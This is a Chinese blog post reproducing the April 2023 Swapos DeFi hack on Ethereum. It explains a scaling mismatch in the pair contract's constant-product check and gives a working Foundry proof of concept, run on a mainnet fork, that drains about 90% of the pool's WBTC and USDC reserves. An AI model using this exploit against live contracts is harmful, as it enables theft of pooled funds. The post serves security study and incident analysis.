[区块链安全-DEFI攻击复现]002-20230416 Swapos

最新推荐文章于 2024-05-13 20:53:18 发布
最新推荐文章于 2024-05-13 20:53:18 发布
阅读量380 收藏 1
点赞数
分类专栏: DeFi攻击复现 区块链探索 文章标签: 区块链 安全 智能合约 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43982484/article/details/130413878
版权

[区块链安全-DEFI攻击复现]002-20230416 Swapos


2023年4月19日, ETH链上的 Swapos遭受了攻击,损失高达 468K美元。

攻击介绍

2023年4月19日,@BeosinAlert发出警告,Ethereum链上的SwaposV2Pair遭受攻击,造成$467,192损失,其中的一个攻击哈希为0x78edc292af51a93f89ac201a742bce9fa9c5d9a7007f034aa30535e35082d50a

攻击分析

使用phalcon进行分析,攻击从流程上看很简单,那就是调用SWP-V2swap函数,一般来说我们都是与router进行交互,除非在swap中有余额方面的漏洞(上一个001-OLIFE也利用了类似的漏洞)。

漏洞在这里:

        balance0 = IERC20(_token0).balanceOf(address(this));
        balance1 = IERC20(_token1).balanceOf(address(this));
        }
        uint amount0In = balance0 > _reserve0 - amount0Out ? balance0 - (_reserve0 - amount0Out) : 0;
        uint amount1In = balance1 > _reserve1 - amount1Out ? balance1 - (_reserve1 - amount1Out) : 0;
        require(amount0In > 0 || amount1In > 0, 'SwaposV2: INSUFFICIENT_INPUT_AMOUNT');
        { // scope for reserve{0,1}Adjusted, avoids stack too deep errors
        uint balance0Adjusted = balance0.mul(10000).sub(amount0In.mul(10));
        uint balance1Adjusted = balance1.mul(10000).sub(amount1In.mul(10));
        require(balance0Adjusted.mul(balance1Adjusted) >= uint(_reserve0).mul(_reserve1).mul(1000**2), 'SwaposV2: K');
        }

因为balance0Adjustedbalance1Adjusted都是乘了10000,而最后只是mul(1000*2),中间差了100倍!

我们不传入,所以_reserve0 - amount0Out = 0,所以balance0Adjusted = balance0,所以我们只要满足balance0Adjusted * 10 >= _reserve0,同时因为有require(amount0In > 0 || amount1In > 0, 'SwaposV2: INSUFFICIENT_INPUT_AMOUNT');,我们可以手动转账1单位以绕过限制。

POC

攻击POC如下:

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;

import "forge-std/Test.sol";
import "../interface.sol";

// @KeyInfo - Total Lost : ~ 486K US$
// Event : Swapos Hack
// Analysis via https://explorer.phalcon.xyz/tx/eth/0x78edc292af51a93f89ac201a742bce9fa9c5d9a7007f034aa30535e35082d50a
// Attacker : 0x53fc4a4a638378b9b81393fbe0fa9a6de2323ebd
// Attack Contract : 0x2df07c054138bf29348f35a12a22550230bd1405
// Vulnerable Contract : 0xf40593a22398c277237266a81212f7d41023b630 (Pancake Swap Contract)
// Attack Tx : https://etherscan.io/tx/0x78edc292af51a93f89ac201a742bce9fa9c5d9a7007f034aa30535e35082d50a

// @Info
// Price manipulation, Vulnerability Exploit

// @Analysis
// DefiHackLab : https://twitter.com/BeosinAlert/status/1647552192243728385

address constant SWAP_ADDRESS = 0xf40593A22398c277237266A81212f7D41023b630;
address constant WBTC_ADDRESS = 0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599;
address constant USDC_ADDRESS = 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48;
uint256 constant USDC_DECIMALS = 6;
uint256 constant WBTC_DECIMALS = 8;

contract Swapos is Test { // EOA Simulation

    function setUp() public {
        vm.createSelectFork("mainnet",17057442); // Go back before hacking time
        console.log("start with block %d",17057442);
        console.log("Attacker address %s",address(this));
    }

    function testExploit() public {
        console.log("start hacking...");
        emit log_named_decimal_uint("[Start] Attacker WBTC Balance", IERC20(WBTC_ADDRESS).balanceOf(address(this)), WBTC_DECIMALS);
        emit log_named_decimal_uint("[Start] Attacker USDC Balance", IERC20(USDC_ADDRESS).balanceOf(address(this)), USDC_DECIMALS);

        Exploit exploit = new Exploit();
        
        exploit.attack();

        console.log("End hacking...");
        emit log_named_decimal_uint("[End] Attacker WBTC Balance", IERC20(WBTC_ADDRESS).balanceOf(address(this)), WBTC_DECIMALS);
        emit log_named_decimal_uint("[End] Attacker USDC Balance", IERC20(USDC_ADDRESS).balanceOf(address(this)), USDC_DECIMALS);


    }
}

contract Exploit is Test{

    address owner;
    constructor() public{
        owner = msg.sender;
    }

    function attack() public {
        deal(USDC_ADDRESS, address(this), 1);
        IUniswapV2Pair pair = IUniswapV2Pair(SWAP_ADDRESS);
        (uint256 amount0, uint256 amount1,) = pair.getReserves();
        IERC20(USDC_ADDRESS).transfer(SWAP_ADDRESS,1);
        pair.swap(amount0/10 * 9, amount1/10 * 9,owner,"");
    }
}

输出如下:

[PASS] testExploit() (gas: 2527934)
Logs:
  start with block 17057442
  Attacker address 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496
  start hacking...
  [Start] Attacker WBTC Balance: 0.00000000
  [Start] Attacker USDC Balance: 0.000000
  End hacking...
  [End] Attacker WBTC Balance: 1.42229691
  [End] Attacker USDC Balance: 43099.909083

总结

说实话不知道该怎么说,这种问题能出现所有人都有责任。。

我看了下地址0x78520513e30ce6Beba2f2e393ae581f3d77db993,其所创建的合约都在攻击发生20个区块后,迅速撤出了流动性。

YANG HANG
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
20210423-国盛证券-区块链行业:DeFi新金融(二),超额抵押与资产映射.pdf
04-24
20210423-国盛证券-区块链行业:DeFi新金融(二),超额抵押与资产映射.pdf
深入了解区块链的漏洞之1:介绍篇
DongAoTony的博客
03-20 2939
大家都知道,区块链作为最近涌现出来的技术,其具有去中心化的特质,以及拥有加密货币属性和智能合约功能,让许多人都看好它,把它当作人类下一代IT革命的引擎技术。但是,区块链本质上是一款去中心化的超级账本软件,因此它不可避免地会存在软件上的漏洞。目前关于区块链的研究,大都聚焦在基于该技术智能合约和具体的应用上面,包括关于区块链安全方面也主要在合约和应用,而关于其底层系统级的安全漏洞则少有涉猎。这里,我们将针对具有代表性的区块链(比特币、以太坊等),探究区块链可能存在的系统漏洞。
完整部署uniswap 合约、前端教程(可部署uniswap到bsc、heco)
zgf1991 IT新人
10-17 2万+
文章目录前提条件部署合约部署工厂和WETH合约部署路由合约(重要环节!!)步骤1 获取字节码步骤2 获得initCode步骤3 替换路由中的initCode当前部署结果部署前端其他补充(懂solidity的可以看看)添加流动性交换方法工具in/out计算公式推导 参考链接 崔棉大师的教程 手把手教你部署自己的uniswap交易所 之前部署是跟着崔棉大师的教程走的,但是部署完了,没法实际使用,添加流动性还是交易会报错 这里主要是做补充; 前提条件 自己有账号,且申请测试以太坊 (ropsten直接小狐狸 b
Uniswap - 智能合约V2代码导读
StarLi2020的博客
06-05 9943
区块链技术是非常有趣的。更有趣的是,区块链技术让交易变得更丰富多彩。从中心化交易,到去中心化交易,再到去中心化AMM。每一种改变都尝试解决之前的问题,但本身也不是完美的。也值得一提的,每一点点进步都非常不容易。有种不积跬步,无以至千里的感觉。 很久之前,就看了Uniswap协议,当时理论分析,流动性提供者在价格波动的情况下,收入微薄。在这样的协议下,流动性是否充足,交易是否足够多,交易费是否有足够的吸引力等等,我觉得都是问题。 区块链 - 深入理解Uniswap协议 没想到,Uniswap今年成了热点。在流
TheDAO悲剧重演,SpankChain重入漏洞分析
热门推荐
Fly_鹏程万里
10-16 2万+
前言 在10月8日,区块链项目方SpankChain在medium上发表了一篇文章, 并表明其受到了攻击,导致损失了160多个ETH和一些Token,这次攻击事件,相对来说损失金额是较小的,约4万美元,不过值得一提的是:这次攻击事件的起因与2016年闹得沸沸扬扬的TheDAO事件如出一辙!一共被盗走300多万ETH,更为严重的是还间接导致了以太坊硬分叉... 自那次事件起,以太坊的智能合约开发...
漏洞复现(CVE-2017-12615)
PDblue的博客
03-27 4350
使用https://github.com/vulhub/vulhub/搭建漏洞测试环境 搭建完成后访问http://host:8080 使用burpsuite抓包,修改数据包进行后门文件上传 上传完成后网站返回201 通过浏览器访问后门文件测试是否上传成功 后门文件成功执行命令,说明漏洞利用成功...
Wepiggy-DeFi智能合约安全审计报告-202109051
08-03
1.前言慢雾安全团队于 2021 年 09 月 04 日,收到 WePiggy 团队对 WePiggy 第四期代码进行安全审计的申请,根据项目特点慢雾安全团队制
Wepiggy-DeFi智能合约安全审计报告-202011111
08-03
1前言慢雾安全团队于 2020 年 11 月 04 日,收到 WePiggy 团队对 WePiggy 安全审计评估的申请,根据项目特点慢雾安全团队制定如下审计方
go-defi:一个Golang SDK,用于处理DeFi协议以及以太坊兼容的区块链
03-25
用于与DeFi协议一起使用的golang SDK和与以太坊兼容的区块链一起使用的通用实用程序。 套餐 客户 绑定 cli 配置 数据库 寿司交换 取消交换 测试环境 utils的 bclient 提供围绕包装ethclient包 绑定 提供由abigen...
元宇宙游戏-区块链游戏-链游的现状及各国监管
08-19
区块链在2021年迎来极大的关注,与之相关NFT、元宇宙更是发展火热。实际上区块链还有一个产物——链游。但链游的光芒被NFT、元宇宙锁遮住了。今天就让我们来认识链游以及链游的各国监管情况。 一、什么是链游? 链游...
区块链安全 - DAO攻击事件解析
Exploit的小站~
03-05 2万+
0x00 前言最近关注了一下区块链方面的安全,因此翻出来之前的DAO攻击事件研究了一番,形成此文。之后可能还会发一些其他的安全分析文章。0x00 基础知识1.跨合约调用智能合约之间的调用本质上是外部调用,可以使用message call或者创建智能合约对象的形式进行调用。(1)使用message call比如合约1调用合约2的某个方法:bytes4 methodId = bytes4(keccak...
零时科技|如何在链上复现安全漏洞?
m0_37598434的博客
03-02 1万+
在链上复现漏洞时,需要明确上链的类型及可相关联的钱包。之后通过领取测试币,部署合约,发起交易,从而实现链上智能合约的测试。
区块链安全—简单函数的危险漏洞(二)
Fly_鹏程万里
01-08 613
一、前言 上回文章中我们提到了简单函数的漏洞利用情况。我们对Fallback()这个回调函数进行了安全漏洞的分析,也针对竞赛题目复现了一些漏洞利用过程。 在本篇文章中,我们继续对简单函数进行安全机制分析。本文我们将要对构造函数以及tx.orgin、msg.sender进行安全分析。在真实的合约开发中,上述这几个函数的使用频率是十分高的,而对于合约来讲,由于其面向对象的特性所迫,所以在编写合约的...
专访 Staynex 创始人 Yuen Wong:酒店行业的变革者
最新发布
TechubNews的博客
05-13 564
整理:Tia,Techub News传统酒店业其实已经很中心化了,几大巨头 OTA 平台几乎已经完成对行业的垄断,而酒店商家也不得不受制于平台的规则制度,向平台支付高比例的费用。Staynex 看到了其中的机会,并想利用区块链将酒店业的商业模式 Web3 化。使用 Staynex,每个用户每月只需要支付 5 美元就可以享受特价,通常会比在大多数 OTA 平台上看到的低 15% 到 30%。 并且,Staynex 还可以配合以 travel to earn,通过捕捉像宝可梦一样的生物,在不同的地点获得忠诚度积
区块链与人工智能哪个更有前景?
xslxf的博客
05-07 377
随着科技的飞速发展,区块链技术和人工智能(AI)无疑是两大热门领域,各自以其独特的魅力吸引着全球的关注。两者虽源自不同的技术基础,却都预示着未来技术发展的无限可能。本文旨在探讨区块链与人工智能各自的前景,分析它们在不同领域的应用潜力
区块链中MEV攻击:危害与防护策略
以择人之心择己,以恕己之心恕人。
05-10 461
在加密货币和区块链的世界里,MEV(最大化提取价值,Maximal Extractable Value)攻击是一种日益受到关注的现象,它涉及交易者、矿工或验证者利用信息不对称、交易排序特权以及市场漏洞来获取超额利润。简单来说,MEV攻击者通过识别和利用尚未执行的交易信息,提前做出反应,以确保自己在交易执行时处于更有利的位置。危害概述:用户体验受损:MEV导致的交易重排序或延迟会影响用户的交易体验,有时甚至造成经济损失。市场公平性受损。
理解并实现区块链智能合约
2301_79507619的博客
05-09 481
Truffle是一个开发框架,Ganache是一个个人区块链,用于部署、开发和测试智能合约,Drizzle是一个前端库。智能合约可以在多种区块链平台上实现,但以太坊是最流行的选择之一,因为它提供了一个成熟的智能合约开发环境。以太坊智能合约通常使用Solidity语言编写,这是一种专为智能合约设计的高级编程语言。智能合约的编写涉及定义合约的结构、变量、函数以及访问控制。这通常涉及将合约的字节码发送到区块链网络,并从合约创建交易中返回一个地址,该地址是合约的唯一标识。区块链智能合约技术不断发展。
探索IT行业的无限可能:现状与未来发展趋势
图灵追幕者博客录
05-13 281
在这个充满活力和变革的领域中,IT行业正经历着前所未有的发展和变革,不断开拓新的领域和挑战新的边界。总的来说,IT行业正处在一个充满活力和变革的时代,技术的不断创新和应用正在为我们的生活和工作带来前所未有的改变。在未来,IT行业将继续发展壮大,为全球经济和社会发展注入新的动力和活力。物联网技术的广泛应用将带来智能家居、智慧城市等新兴领域的发展,5G通信技术的商用化将推动移动互联网的快速发展。区块链技术的安全性和可追溯性使其在金融、供应链管理等领域有着广泛的应用前景,未来将成为IT行业的新的增长点。
defi夹子的数学模型有那些
12-01
DeFi夹子的数学模型主要涉及到金融数学和概率论。首先,DeFi夹子的数学模型可以基于期权定价模型,比如Black-Scholes模型或者Binomial模型,来对DeFi的期权合约进行定价和风险管理。这些模型可以帮助DeFi平台和用户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值